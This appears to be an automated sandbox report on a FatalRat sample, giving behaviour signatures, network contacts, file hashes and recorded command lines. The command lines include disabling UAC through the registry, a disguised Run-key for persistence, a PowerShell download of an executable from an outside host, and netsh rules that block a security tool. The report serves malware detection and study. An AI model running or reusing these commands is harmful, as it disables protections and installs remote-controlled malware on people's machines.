Analysis Overview
SHA256
b17337db64b6ab60e969cec89c36058baf5e100c25684bda9beb0afa1c342b4d
Threat Level: Known bad
The file 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Fatalrat family
FatalRat
Fatal Rat payload
Blocklisted process makes network request
Modifies Windows Firewall
Downloads MZ/PE file
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Command and Scripting Interpreter: PowerShell
Drops desktop.ini file(s)
Adds Run key to start application
Checks installed software on the system
System Location Discovery: System Language Discovery
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Modifies registry class
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Suspicious behavior: AddClipboardFormatListener
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2025-02-23 12:41
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-02-23 12:41
Reported
2025-02-23 12:44
Platform
win7-20240903-en
Max time kernel
148s
Max time network
152s
Command Line
Signatures
FatalRat
Fatalrat family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
Fatal Rat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\programdata\20250223024200\Agghosts.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\programdata\20250223024200\Agghosts.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\GoogleUpdata_Service = "C:\\programdata\\lnk\\dick.lnk" | C:\Windows\System32\reg.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\programdata\20250223024200\Agghosts.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\programdata\20250223024200\Agghosts.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\programdata\20250223024200\Agghosts.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\programdata\20250223024200\Agghosts.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Public\Downloads\20250223024200\1.bat" "
C:\programdata\20250223024200\Agghosts.exe
"C:\programdata\20250223024200\Agghosts.exe"
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Public\Videos\download_and_run.bat" "
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Public\Downloads\20250223024200\fhq.bat" "
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="" enable=yes
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe', 'C:\Users\Public\Videos\bin.exe')"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access2" dir=in action=block program="safemon\360tray.exe=360Safe.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access2" dir=out action=block program="safemon\360tray.exe=360Safe.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state on
C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile settings inboundusernotification disable
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile settings inboundusernotification disable
C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile settings inboundusernotification disable
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | baba-1336130708.cos.ap-tokyo.myqcloud.com | udp |
| JP | 43.128.240.48:443 | baba-1336130708.cos.ap-tokyo.myqcloud.com | tcp |
| N/A | 127.0.0.1:49245 | tcp | |
| US | 8.8.8.8:53 | www.baidu.com | udp |
| CN | 103.235.47.188:80 | www.baidu.com | tcp |
| US | 8.8.8.8:53 | spoutry.it.com | udp |
| JP | 118.107.15.176:8081 | spoutry.it.com | tcp |
| JP | 43.128.240.48:443 | baba-1336130708.cos.ap-tokyo.myqcloud.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.18:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 2.17.5.133:80 | www.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabF124.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarF3E5.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
memory/2736-36-0x0000000003DE0000-0x00000000041F4000-memory.dmp
memory/2736-38-0x0000000001CE0000-0x0000000001CE1000-memory.dmp
memory/2736-37-0x0000000004200000-0x0000000004619000-memory.dmp
memory/2736-35-0x0000000004200000-0x0000000004619000-memory.dmp
memory/2736-39-0x0000000004200000-0x0000000004619000-memory.dmp
C:\Users\Public\Downloads\20250223024200\1.bat
| MD5 | fa42ebb1071abc0e618c296ea2cf71a6 |
| SHA1 | 9e0c0737b0e37b3e821d011eecd9b0c7c9f2a15a |
| SHA256 | 395f835731d25803a791db984062dd5cfdcade6f95cc5d0f68d359af32f6258d |
| SHA512 | 0ed9919675c224201996caeeecf625a1db00a70af5d3ba135dc3d6fa16bfcc562426c813e21b4e861f04d312635be3528d79b5c49b23e78161f2b051fa9aaf05 |
C:\ProgramData\20250223024200\Agghosts.exe
| MD5 | 2a24dcd41bc3c5b5f7eceda525786578 |
| SHA1 | 7e898f9ee5a97a1a261326f0168e8de44dcf8af4 |
| SHA256 | 169e9e4b23878035551455f4e5dbd01ece204e59fe75361680e8786998059ca7 |
| SHA512 | aaded4c72d3fa77eefd9d4b098288dd6923bd79813466d93313d6acb00fea9bb90248fff92cc89a625c60ae3b7cc1c27e8bb178fdac624ec896267da57b9fd6a |
C:\ProgramData\lnk\2.lnk
| MD5 | 33d26e34abac9364def07a7bc4c53043 |
| SHA1 | a2132a28c45de1a5410ea034fb841a962221c669 |
| SHA256 | 61419b248afc224acea8715cc94010539d847de72c1a2014a8312eb036115aa2 |
| SHA512 | 7fd13729ba06fba1febdefb24b3e2ad97681b897e68be0ccfebb9992f89a7a15734a355502e89687ea33fc4bf15648074942e21a43b8ed3acdf162159287bac6 |
C:\programdata\20250223024200\libcef.dll
| MD5 | b7f8c3416cdfd6f46c790da064f66099 |
| SHA1 | d7ae9a3d49bbf1981e7d6604128e18b6cd160bd6 |
| SHA256 | b9edf03447cf402e24da384c146c9d1536871a47518c795c4aea6550e3abd94d |
| SHA512 | 24272954e57f4f4f81dad90469e84946549e3441ba599f8b819d069b803687b3da35f449c0f18755352dba208d6d63af1d6b53c0a56adbd36540b1537bb99dc7 |
C:\Users\Public\Videos\download_and_run.bat
| MD5 | a90ccfd040d774b547f7d258b8e03661 |
| SHA1 | c46e353d34723f9393482974a516d51dfb52440d |
| SHA256 | d852cfc4107e9ce5bec7349ef180366bbb4fe0878e725325a2b844f93a1ac1e2 |
| SHA512 | bdc816781c44b6e9bbc8207a3c0466a45397cf7815f267add21abe243bf138b5bae7ffec867433bf249e139b726413f68b7002f541c89ae1a25bd1e6980abfd7 |
C:\programdata\20250223024200\Ensup.log
| MD5 | 2fd94f6e1d71454d716a126f0d7450ac |
| SHA1 | 5d966df95c741880089e9078af921a22216516ec |
| SHA256 | a599cbb05b69328655a7a0afc2644ed607c30a05edfb8fd6be2ea920c25b54b5 |
| SHA512 | 340107b69fc49b8fe1acf37a3a6e40c4b7206cf3ae069fea6f4ba702a733401e1feef55e1d858b3529764bcd0ba371ef552f5838444b65b62545e1da150f9bb2 |
C:\Users\Public\Downloads\20250223024200\fhq.bat
| MD5 | 3a7cb580bd340505f6dc5b4c829a3eca |
| SHA1 | 21cc730517d74fa1d13316d7e0d817f3bd710906 |
| SHA256 | 1c1528b546aa29be6614707cbe408cb4b46e8ed05bf3fe6b388b9f22a4ee37e2 |
| SHA512 | c224fa676542b90f8fc990e574028af664dced61612855290fb23ce4acad2d6b9043e901365939106b591b6746b3e4ddada15eede88a947051e9d8083194e630 |
memory/2384-96-0x0000000000160000-0x0000000000189000-memory.dmp
memory/2736-94-0x0000000003DE0000-0x00000000041F4000-memory.dmp
memory/2736-93-0x0000000004200000-0x0000000004619000-memory.dmp
memory/1688-107-0x00000000023D0000-0x00000000023D8000-memory.dmp
memory/1688-106-0x000000001B5E0000-0x000000001B8C2000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | aea5c63f53c52acaf4ba4b9596cc834e |
| SHA1 | e3fc687954187fbc81bad8ee865ee9b39df8e1c7 |
| SHA256 | 28c518fd853b0a5e5d6f387fc63e1936c69a6029163a2f765ee71c4cace53ab0 |
| SHA512 | d3d6526182333f721a7efbcedcc8ff4bfa3d61b3f843d49b71cd74532b8fd3fe4751a8413be338ca07cc74a8059963401a26265df9546952f4f19f82ab448844 |
Analysis: behavioral2
Detonation Overview
Submitted
2025-02-23 12:41
Reported
2025-02-23 12:44
Platform
win10v2004-20250217-en
Max time kernel
141s
Max time network
150s
Command Line
Signatures
FatalRat
Fatalrat family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
Fatal Rat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\programdata\20250223024202\Agghosts.exe | N/A |
| N/A | N/A | C:\Users\Public\Videos\bin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\programdata\20250223024202\Agghosts.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdata_Service = "C:\\programdata\\lnk\\dick.lnk" | C:\Windows\System32\reg.exe | N/A |
Checks installed software on the system
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\programdata\20250223024202\Agghosts.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Public\Videos\bin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\programdata\20250223024202\Agghosts.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\programdata\20250223024202\Agghosts.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\DefaultIcon | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\shell\open\command | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\shell | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\ = "URL:TonSite Link" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\DefaultIcon | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\shell\open\command | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\DefaultIcon | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\shell\open\command | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\DefaultIcon | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\shell | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\shell | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\shell\open\command | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\shell\open | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\URL Protocol | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\shell\open | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\shell\open | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\URL Protocol | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\shell\open | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
